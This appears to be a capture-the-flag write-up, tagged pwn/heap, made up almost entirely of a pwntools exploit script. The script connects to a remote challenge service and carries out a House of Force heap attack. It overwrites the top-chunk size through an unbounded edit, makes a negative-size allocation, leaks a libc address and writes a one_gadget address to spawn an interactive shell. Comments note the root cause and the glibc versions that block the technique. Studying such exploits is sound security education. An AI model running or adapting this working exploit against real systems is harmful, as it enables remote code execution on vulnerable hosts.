Tags: pwn heap
Rating:
```
from pwn import *
# Connection handle shared by every helper below.  The live line opens the
# remote CTF service; the two commented alternatives run the local binary and
# attach gdb with a breakpoint on edit_profile for debugging.  Because this
# runs at import time, merely importing the module opens the connection.
#p = process('./chall')
p = remote('139.59.252.147',17011)
#pid = gdb.attach(p,gdbscript='''
# b * edit_profile
# ''')
def setup():
    """Answer the service's initial 'username: ' prompt with a placeholder name."""
    initial_name = 'aaa'
    p.sendlineafter('username: ', initial_name)
def create(name_size, name, content):
    """Drive menu option 1 (create): send the name size, the name, then the content.

    Each value is sent as text via str(); the prompt strings must match the
    service's output byte for byte or sendlineafter() blocks.
    """
    exchange = (
        ('#> ', '1'),
        ('size: ', str(name_size)),
        ('Name: ', str(name)),
        ('Content: ', str(content)),
    )
    for prompt, answer in exchange:
        p.sendlineafter(prompt, answer)
def edit_username(username):
    """Drive menu option 5: replace the stored username with str(username)."""
    p.sendlineafter('#> ', '5')
    new_name = str(username)
    p.sendlineafter('username: ', new_name)
def edit(index, name, content):
    """Drive menu option 3 (edit): select profile `index`, then send a new name and content.

    `index` may be an int or a str; it is sent through str() either way.  The
    prompt here is 'Index: ' (no space before the colon), unlike view()'s.
    """
    exchange = [('#> ', '3'), ('Index: ', str(index))]
    exchange.append(('Name: ', str(name)))
    exchange.append(('Content: ', str(content)))
    for prompt, answer in exchange:
        p.sendlineafter(prompt, answer)
def feedback(size, content):
    """Drive menu option 6: request a feedback buffer of `size` bytes and fill it with `content`.

    `size` is forwarded verbatim through str(), so a negative value reaches the
    service unchanged; whether the service range-checks it is not visible here.
    """
    size_text, body_text = str(size), str(content)
    p.sendlineafter('#> ', '6')
    p.sendlineafter('size: ', size_text)
    p.sendlineafter('Feedback: ', body_text)
def view(index):
    """Drive menu option 2 (view): print profile `index`.

    The prompt is 'Index : ' (space before the colon) here, which differs from
    the 'Index: ' prompt used by the edit menu.
    """
    steps = (('#> ', '2'), ('Index : ', str(index)))
    for prompt, answer in steps:
        p.sendlineafter(prompt, answer)
def exploit():
    """Run the full interaction against the connected target `p`.

    Read top to bottom: one profile is created, the username is set to a long
    run of 'a', an oversized name passed through edit() ends in eight 0xff
    bytes (the variable is named overwrite_top), a feedback buffer is requested
    with a *negative* size, two more profiles are created, a libc address is
    read back from profile 2, libc offsets are applied to it, and a final edit()
    writes the computed address.  The names and values match the House of Force
    pattern (inflate the top-chunk size, then move top with a huge request) —
    NOTE(review): inferred from this script alone; the binary is not shown.

    Defender notes: the edit() name written below (684 bytes) is far longer
    than the 2-byte size the profile was created with, so the edit path
    evidently does not bound the write by the allocated size — that is the
    root cause.  glibc >= 2.29 aborts with "malloc(): corrupted top size" when
    the top chunk size is implausible, and glibc 2.34 removed __malloc_hook, so
    this chain depends on an older libc.  All offsets below are specific to one
    libc build (values as given in the write-up) and must be re-derived for any
    other.
    """
    setup()
    create(2,'aa','xD')
    # 0x168-byte username; the same value is sent again before the final edit.
    username_one = 'a' * 0x168
    edit_username(username_one)
    ffs = 10 - 7
    # 700 - 8*3 = 676 filler bytes, then eight 0xff bytes (-1 as a qword).
    overwrite_top = 'a'*(700 - 8*ffs)+'\xff\xff\xff\xff\xff\xff\xff\xff'
    edit(0,overwrite_top,'aa')
    # Size sent is -1180; presumably treated as a huge unsigned request by the
    # service — TODO confirm against the binary.
    feedback(-1340+160,"")
    # 0x404008 presumably a GOT slot of a non-PIE binary — verify in the binary.
    create(20,"\x00"*12 + p64(0x404008),'b')
    create(12,'A'*12,'')
    view(2)
    p.recvuntil('AAAAAAAAAAAA')
    # recv(6) returns *up to* 6 bytes; a short read is padded by ljust() and
    # mis-parsed silently.  recvn(6) would wait for exactly six bytes.
    leak = u64(p.recv(6).ljust(8,'\0'))
    print "leaked libc == flag: ", hex(leak)
    # Offsets for one specific libc build; only one_gadget_2 is used below.
    mhook_offset = 0x00000000003ebc30
    strncpy_offset = 0x000000000009d980
    one_gadget_1 = 0x4f3d5
    one_gadget_2 = 0x4f432
    one_gadget_3 = 0x10a41c
    # The extra 0x189a0 adjustment is unexplained here — presumably the leaked
    # pointer is not strncpy itself; confirm how it was derived.
    libc_base = leak - strncpy_offset - 0x189a0
    malloc_hook = libc_base + mhook_offset
    actual_1g = libc_base + one_gadget_2
    print 'libc_base: '+hex(libc_base)
    print 'malloc_hook: '+hex(malloc_hook)
    print 'actual_1g: '+ hex(actual_1g)
    edit_username(username_one)
    # Index passed as the string '2' here but as the int 0 above; edit() applies
    # str() to both, so the inconsistency is harmless but worth normalising.
    edit('2',28*'A' + p64(actual_1g), '\x00'*100)
    # edit_username('mamatijeata')
    p.interactive()
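if __name__ == '__main__':
    # Only drive the target when run as a script, so the helpers above can be
    # imported without starting the interaction.  The module-level remote()
    # call still opens the connection at import time.
    exploit()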
```